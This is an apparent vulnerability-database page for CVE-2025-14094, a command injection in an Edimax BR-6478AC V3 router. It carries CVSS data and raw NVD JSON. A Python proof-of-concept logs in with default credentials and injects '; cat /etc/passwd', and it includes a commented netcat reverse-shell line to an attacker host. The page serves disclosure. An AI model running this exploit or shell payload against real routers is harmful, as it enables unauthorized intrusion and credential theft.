CVE-2025-14094

Description

A flaw has been found in Edimax BR-6478AC V3 1.0.15. The affected element is the function sub_44CCE4 of the file /boafrm/formSysCmd. This manipulation of the argument sysCmd causes os command injection. The attack may be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:o:edimax:br-6478ac_v3_firmware:1.0.15:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:edimax:br-6478ac_v3:-:*:*:*:*:*:*:* - NOT VULNERABLE

Edimax BR-6478AC V3 固件版本 1.0.15

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-14094 PoC - Edimax BR-6478AC V3 OS Command Injection
# Target: Edimax BR-6478AC V3 (Firmware 1.0.15)
# Vulnerability: OS Command Injection in /boafrm/formSysCmd via sysCmd parameter

import requests
import sys

target = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.1.1"

# Authentication credentials (default or compromised)
username = "admin"
password = "1234"

# Login to get session cookie
login_data = {
    "username": username,
    "password": password
}

session = requests.Session()
login_url = f"{target}/boafrm/formLogin"
response = session.post(login_url, data=login_data)

# Check if login successful
if response.status_code == 200:
    print("[+] Login successful")
else:
    print("[-] Login failed")
    sys.exit(1)

# Exploit: OS Command Injection via sysCmd parameter
# Inject command to read /etc/passwd
cmd_injection = "; cat /etc/passwd"
exploit_url = f"{target}/boafrm/formSysCmd"
exploit_data = {
    "sysCmd": cmd_injection
}

print(f"[*] Sending exploit payload: {cmd_injection}")
response = session.post(exploit_url, data=exploit_data)

if response.status_code == 200:
    print("[+] Exploit sent successfully")
    print("Response:")
    print(response.text)
else:
    print("[-] Exploit failed")

# Example: Reverse shell payload
# cmd_injection = "; nc -e /bin/sh <attacker_ip> <port>"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-14094
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-14094
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-14094/
[4] VulDB https://vuldb.com/cve/CVE-2025-14094
[5] https://github.com/Kriswu1337/CVE/blob/main/EDIMAX/1/3.md
[6] https://vuldb.com/?ctiid.334484
[7] https://vuldb.com/?id.334484
[8] https://vuldb.com/?submit.696668

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-14094", "sourceIdentifier": "[email protected]", "published": "2025-12-05T17:16:02.917", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in Edimax BR-6478AC V3 1.0.15. The affected element is the function sub_44CCE4 of the file /boafrm/formSysCmd. This manipulation of the argument sysCmd causes os command injection. The attack may be initiated remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}, {"lang": "en", "value": "CWE-78"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:edimax:br-6478ac_v3_firmware:1.0.15:*:*:*:*:*:*:*", "matchCriteriaId": "AADB47D9-D07B-4E9F-9C2E-C78E5A14CABD"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:edimax:br-6478ac_v3:-:*:*:*:*:*:*:*", "matchCriteriaId": "4632BC8A-4A12-4889-B431-E20174786A89"}]}]}], "references": [{"url": "https://github.com/Kriswu1337/CVE/blob/main/EDIMAX/1/3.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.334484", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.334484", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.696668", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}